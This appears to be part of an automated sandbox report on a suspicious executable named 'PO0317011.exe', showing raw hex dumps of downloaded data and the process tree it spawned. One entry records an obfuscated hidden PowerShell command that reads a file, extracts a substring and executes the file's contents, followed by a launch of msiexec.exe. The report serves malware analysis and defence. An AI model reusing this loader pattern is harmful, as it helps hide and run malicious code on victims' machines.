                            2025-03-14 10:59:25 UTC16384INData Raw: e4 78 cb 4a 39 d2 a4 64 9d 92 43 5d 44 d7 25 80 f0 f7 56 ad 35 8d 67 bc af a0 ce 24 9c 3c eb 8f 4a 27 d0 9d a4 17 79 6b b4 c4 34 5d 69 67 46 e4 16 07 72 58 8c cc 3e 75 7d 45 22 79 c0 4b 09 b7 9f 3f 8a 81 ab 21 94 c2 ab bb 7c 81 7a 4e 04 62 6c 78 6e 22 a2 ad b6 79 38 bb 06 d9 da 7f c5 58 7a 07 e0 3c 5f ea e9 a5 c1 79 75 f0 af cd fa be 37 5b 6f ca ca 66 ae 18 ba e8 0b ee 76 1d e6 34 0f d2 4c fa 5d f5 5a 40 70 c5 a5 53 a6 6d fa 38 d9 14 75 e4 0d 42 ff 91 09 f3 87 1f 3f bd 2a 84 95 38 fb b4 0e 93 58 b2 e9 c5 35 13 cc d2 ce 4a f3 20 86 b9 6a 2f 9b 7b 5d 6e 0c 78 d5 a4 3d b2 82 eb 7f 07 c3 06 60 0b f5 43 2a 69 6c 64 fe ec 8e 0c 78 f7 58 3c 28 95 8d 3a 92 b9 d2 94 71 3b de 14 9e 41 a5 6d 86 7e 32 c2 30 06 db 99 91 15 21 b4 c5 fc b1 7c 49 10 76 f3 cc 65 68 7d 4a
                            Data Ascii: xJ9dC]D%V5g$<J'yk4]igFrX>u}E"yK?!|zNblxn"y8Xz<_yu7[ofv4L]Z@pSm8uB?*8X5J j/{]nx=`C*ildxX<(:q;Am~20!|Iveh}J
                            2025-03-14 10:59:25 UTC16384INData Raw: 5f 18 b8 ae c7 c0 4c 79 6b 8f 86 e7 9b 7c d4 17 e9 3f 92 dd dd 31 6e ea c6 b9 52 58 e3 96 ff 94 8c b1 2c bc 3e d4 fc b9 3c 4b 65 50 aa 07 9e 64 5c 72 46 39 32 16 6a dd e4 7e e7 6d 61 6c 9d a0 72 30 af 47 16 43 17 35 76 cb d9 5d af 8f 29 e0 84 1d 79 0f 21 55 63 d4 7c 6e ba d0 83 76 a1 54 3f 19 64 2e a4 bf 2a 9f 14 7b 45 6b a9 3d 25 88 a1 61 b4 3f af ca 8e d1 fd 52 54 b8 23 e8 23 54 b7 9d e9 e4 39 14 a4 3a b9 dc b0 46 74 b5 89 5a 28 8d 00 7a 40 ac c8 2d 84 5f eb 73 b7 40 11 31 ee 3d df ec 58 c9 8d db e7 a3 84 8d dd e6 e8 39 bf 78 3e 3b 44 dc 26 05 22 f4 16 53 55 33 78 e5 84 43 75 18 ef a4 32 fc c2 f0 32 7b 2d 34 76 5b 43 3e 85 ae 81 bb ad f9 f1 ae b0 7d 31 c7 17 d1 27 61 bf a6 b9 37 23 66 da 69 2b 84 84 2b dd 44 a0 07 97 ee bd 13 d5 20 e0 e4 0c 90 61 1f 00
                            Data Ascii: _Lyk|?1nRX,><KePd\rF92j~malr0GC5v])y!Uc|nvT?d.*{Ek=%a?RT##T9:FtZ(z@-_s@1=X9x>;D&"SU3xCu22{-4v[C>}1'a7#fi++D a
                            2025-03-14 10:59:25 UTC16384INData Raw: 46 3d 65 f4 28 44 ef 93 74 cb 2a ad 4a 80 56 84 58 60 5e dc 94 95 23 36 47 38 3d ef e3 c9 a2 f4 54 f2 53 cd 6c 58 22 38 7c c5 55 e3 db 44 1a 6b 6d 8a fd c3 b4 99 c2 96 2f 3f 7b e1 7b 99 38 56 40 9a bf 3b ba 42 c6 da 56 ba 7a 29 93 5d 54 73 c4 a8 e2 5b 54 8a a4 7b f7 b8 2c a8 ec 1c 5d b8 81 b6 15 ca 75 52 ae a1 51 f1 43 3b ee ec 4f 97 73 6f 2c 97 1f b8 5e 30 f6 a9 4c aa 1e 6e a8 82 05 52 84 05 63 28 aa fb 82 f3 12 dd b6 ce 07 79 4c ec f8 f7 0b b6 8b b9 46 72 f8 bf 5a 2c 0d 13 52 7e 2c 29 dd 1c 47 96 25 94 4c 4f 8c 5b 7f 71 4b fa bb 8d c9 22 5b 4b 6f 3e fe 8d dc 1b 72 e9 c8 df eb 22 2a 21 d1 16 ea 52 b7 9e b9 1a e5 05 05 5e f6 61 ca 2c 71 95 73 aa e4 5a 15 41 49 08 69 5c 76 6e 3a 74 d0 18 a6 72 4d 4b dc 0c e0 c5 6c 00 e3 31 ae be 6f ab bc 75 93 8d 69 ec bd
                            Data Ascii: F=e(Dt*JVX`^#6G8=TSlX"8|UDkm/?{{8V@;BVz)]Ts[T{,]uRQC;Oso,^0LnRc(yLFrZ,R~,)G%LO[qK"[Ko>r"*!R^a,qsZAIi\vn:trMKl1oui
                            2025-03-14 10:59:25 UTC16384INData Raw: 64 22 54 83 84 fe 59 e8 b5 59 3e 2a fb 8d 61 90 18 a3 3b b7 fb f4 8f 8a a3 09 6d 66 32 49 a3 21 1d f8 aa 97 a3 7b e6 88 22 fb 3f 87 69 be 25 af e5 71 54 94 27 7e 04 5d c1 4c 8b 2a 06 50 6f 6d 15 f6 c9 01 b4 82 3a b4 ae 0f f6 49 9d ab 3f 9d ee 08 37 7a 17 17 ba ad 87 0b 58 5f 23 1d 46 c5 8a d5 fa 93 57 3b 49 58 ec c9 19 c2 30 86 2a a3 48 cb 90 91 3d e7 fa 13 50 56 92 88 d1 38 7a 4a 8c 36 1b d1 c0 49 fc 65 9c 10 49 08 cf 7b e5 b4 bc f8 5e 02 84 cc b8 a1 f9 80 cd a8 ac 39 3f c5 09 45 c9 57 d6 3c 30 72 88 2c 3f 6c 06 a6 85 12 38 8e e8 71 f8 9a c6 83 f3 97 bf 4f 57 e9 36 59 a7 ff 81 87 3f 5c a8 ce 9b 9e e1 59 07 80 9a f5 b8 ed a4 30 a1 52 c7 3a 93 e9 98 2e 65 f5 48 cb 74 47 63 1d c6 89 6f 5a 48 f8 f1 95 ab 51 ac 65 e3 02 c0 fa 45 26 da 37 66 88 5c 27 23 20 60
                            Data Ascii: d"TYY>*a;mf2I!{"?i%qT'~]L*Pom:I?7zX_#FW;IX0*H=PV8zJ6IeI{^9?EW<0r,?l8qOW6Y?\Y0R:.eHtGcoZHQeE&7f\'# `
                            2025-03-14 10:59:25 UTC16384INData Raw: 66 32 1a 50 47 70 3a 40 fa dc 35 cf 69 63 30 8b 24 0e 4b c7 8f c5 15 9f 02 5a 7b 7c c9 3c 6a 72 70 b4 1e f1 08 9e e2 b3 f3 43 11 dc dc cf fc 08 20 9b 97 a9 bc 3b de 50 08 f5 36 08 f3 4c f8 8a 3b 7b 45 3f 09 24 4c f4 e3 c9 7f dc 6d 2e 58 b3 60 f7 dd 83 6f 29 64 ab b6 7d 01 a8 13 e7 66 59 be fb c7 4c 82 cd 13 73 10 d4 e0 f6 d1 bb 20 65 9f 25 36 57 c7 30 a9 10 05 83 16 03 50 e9 2c 60 00 2e f4 8b 7e 06 5f b9 a5 7c 4c 4f 8a 81 f8 67 ca 3e 01 44 31 41 ee 36 0c d6 14 fe 21 3b 07 2a 48 26 55 66 66 00 f4 3c c4 a6 b1 0b 6c e6 bb 49 50 01 16 08 35 3e ad 78 bc 65 62 de dd d9 2a 03 57 d8 c1 3d 2e a2 7e 26 32 09 62 4e be 87 15 c4 c9 64 6c 34 d7 ce b9 40 be 51 a9 eb ee b1 e1 f7 82 84 e9 57 f4 2a 19 78 08 55 6f 30 0c f6 5e 86 d2 95 f6 0f 04 51 d4 1e cf 8c 7e 54 a2 79 a0
                            Data Ascii: f2PGp:@5ic0$KZ{|<jrpC ;P6L;{E?$Lm.X`o)d}fYLs e%6W0P,`.~_|LOg>D1A6!;*H&Uff<lIP5>xeb*W=.~&2bNdl4@QW*xUo0^Q~Ty


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:06:57:41
                            Start date:14/03/2025
                            Path:C:\Users\user\Desktop\PO0317011.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\PO0317011.exe"
                            Imagebase:0x400000
                            File size:734'784 bytes
                            MD5 hash:AC30B21EA0E4758774EEC541EF3445E3
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:1
                            Start time:06:57:41
                            Start date:14/03/2025
                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):true
                            Commandline:powershell.exe -windowstyle hidden "$Yern=GC -Raw 'C:\Users\user\AppData\Local\resider\actinidiaceae\Sendetidernes.fru';$Haul=$Yern.SubString(53177,3);.$Haul($Yern)"
                            Imagebase:0x9d0000
                            File size:433'152 bytes
                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:2
                            Start time:06:57:41
                            Start date:14/03/2025
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff62fc20000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:11
                            Start time:06:59:15
                            Start date:14/03/2025
                            Path:C:\Windows\SysWOW64\msiexec.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                            Imagebase:0x9a0000
                            File size:59'904 bytes
                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Disassembly

                            Reset < >